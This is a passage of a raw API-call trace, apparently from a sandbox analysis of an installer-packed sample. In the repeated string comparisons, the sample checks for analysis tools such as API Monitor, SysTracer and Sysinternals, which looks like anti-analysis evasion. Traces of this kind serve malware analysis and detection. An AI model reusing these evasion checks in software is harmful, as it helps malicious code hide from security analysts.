lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.484] lstrlenA (lpString="3399936") returned 7 [0158.484] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.484] lstrcpynA (in: lpString1=0x40a418, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.484] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.484] lstrcpynA (in: lpString1=0x337acc, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.485] lstrcpynA (in: lpString1=0x432800, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.485] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.485] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | 
out: lpString1="3399936") returned="3399936" [0158.485] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.485] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.485] lstrlenA (lpString="") returned 0 [0158.485] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.485] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.485] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.485] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.485] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.485] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.485] lstrlenA (lpString="") returned 0 [0158.485] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.485] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.485] lstrlenA (lpString="") returned 0 [0158.485] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.485] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.485] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.485] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | 
out: lpString1="") returned="" [0158.485] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.485] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.485] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.485] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.486] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.486] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.486] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.486] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.486] GetModuleHandleA 
(lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.486] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.486] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.486] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.486] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.486] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.486] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.486] lstrcpynA (in: lpString1=0x340df8, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.486] lstrcpynA (in: lpString1=0x3401e0, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.487] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.487] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.487] lstrcpynA (in: lpString1=0x340df8, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.487] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.487] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.487] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.487] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.487] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.487] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.487] lstrcpynA (in: 
lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.487] lstrlenA (lpString="0") returned 1 [0158.487] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.487] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.487] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.487] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.487] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.487] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.487] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.487] lstrlenA (lpString="0") returned 1 [0158.487] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.487] lstrlenA (lpString="") returned 0 [0158.487] lstrcpynA (in: lpString1=0x33723c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.488] lstrcpynA (in: lpString1=0x337684, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.488] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.488] lstrlenA (lpString="3399936") returned 7 [0158.488] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.488] lstrcpynA (in: lpString1=0x40a418, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.488] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") 
returned="3399936" [0158.488] lstrcpynA (in: lpString1=0x337acc, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.488] lstrcpynA (in: lpString1=0x432800, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.488] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.488] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.488] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.488] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.488] lstrlenA (lpString="") returned 0 [0158.488] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.488] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.488] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.488] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.488] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.488] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.488] lstrlenA (lpString="") returned 0 [0158.488] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.488] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.488] lstrlenA (lpString="") returned 0 [0158.488] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.488] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", 
iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.489] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.489] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.489] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.489] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.489] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.489] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.489] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.489] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") 
returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.489] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.489] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.489] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.489] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.490] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.490] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.490] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.490] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.490] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.490] lstrcpynA (in: lpString1=0x341200, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.490] lstrcpynA (in: lpString1=0x3401e0, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.490] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.490] strstr (_Str="", _SubStr="API Monitor") returned 0x0 [0158.490] lstrcpynA (in: lpString1=0x341200, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.490] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.490] wsprintfA (in: 
param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.490] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.490] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.490] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.490] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.491] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.491] lstrlenA (lpString="0") returned 1 [0158.491] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.491] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.491] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.491] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.491] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.491] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.491] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.491] lstrlenA (lpString="0") returned 1 [0158.491] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.491] lstrlenA (lpString="") returned 0 [0158.491] lstrcpynA (in: lpString1=0x33723c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.491] lstrcpynA (in: lpString1=0x337684, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" 
[0158.491] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.491] lstrlenA (lpString="3399936") returned 7 [0158.491] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.491] lstrcpynA (in: lpString1=0x40a418, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.491] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.491] lstrcpynA (in: lpString1=0x337acc, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.491] lstrcpynA (in: lpString1=0x432800, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.491] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.491] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.491] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.492] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.492] lstrlenA (lpString="") returned 0 [0158.492] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.492] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.492] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.492] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.492] 
lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.492] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.492] lstrlenA (lpString="") returned 0 [0158.492] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.492] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.492] lstrlenA (lpString="") returned 0 [0158.492] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.492] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.492] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.493] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.493] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.493] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.493] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.493] lstrcpynA (in: 
lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.493] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.493] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.493] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.493] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.493] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.493] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.493] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.494] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.494] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.494] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.494] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.494] lstrcpynA (in: lpString1=0x340df8, 
lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.494] lstrcpynA (in: lpString1=0x3401e0, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.494] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.494] strstr (_Str="", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.494] lstrcpynA (in: lpString1=0x340df8, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.494] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.494] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.494] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.494] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.494] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.494] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.494] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.495] lstrlenA (lpString="0") returned 1 [0158.495] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.495] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.495] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.495] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") 
returned="3399936" [0158.495] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.495] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.495] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.495] lstrlenA (lpString="0") returned 1 [0158.495] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.495] lstrlenA (lpString="") returned 0 [0158.495] lstrcpynA (in: lpString1=0x33723c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.495] lstrcpynA (in: lpString1=0x337684, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.495] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.495] lstrlenA (lpString="3399936") returned 7 [0158.495] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.495] lstrcpynA (in: lpString1=0x40a418, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.495] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.495] lstrcpynA (in: lpString1=0x337acc, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.495] lstrcpynA (in: lpString1=0x432800, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.495] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.495] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.495] lstrcpynA (in: lpString1=0x337684, 
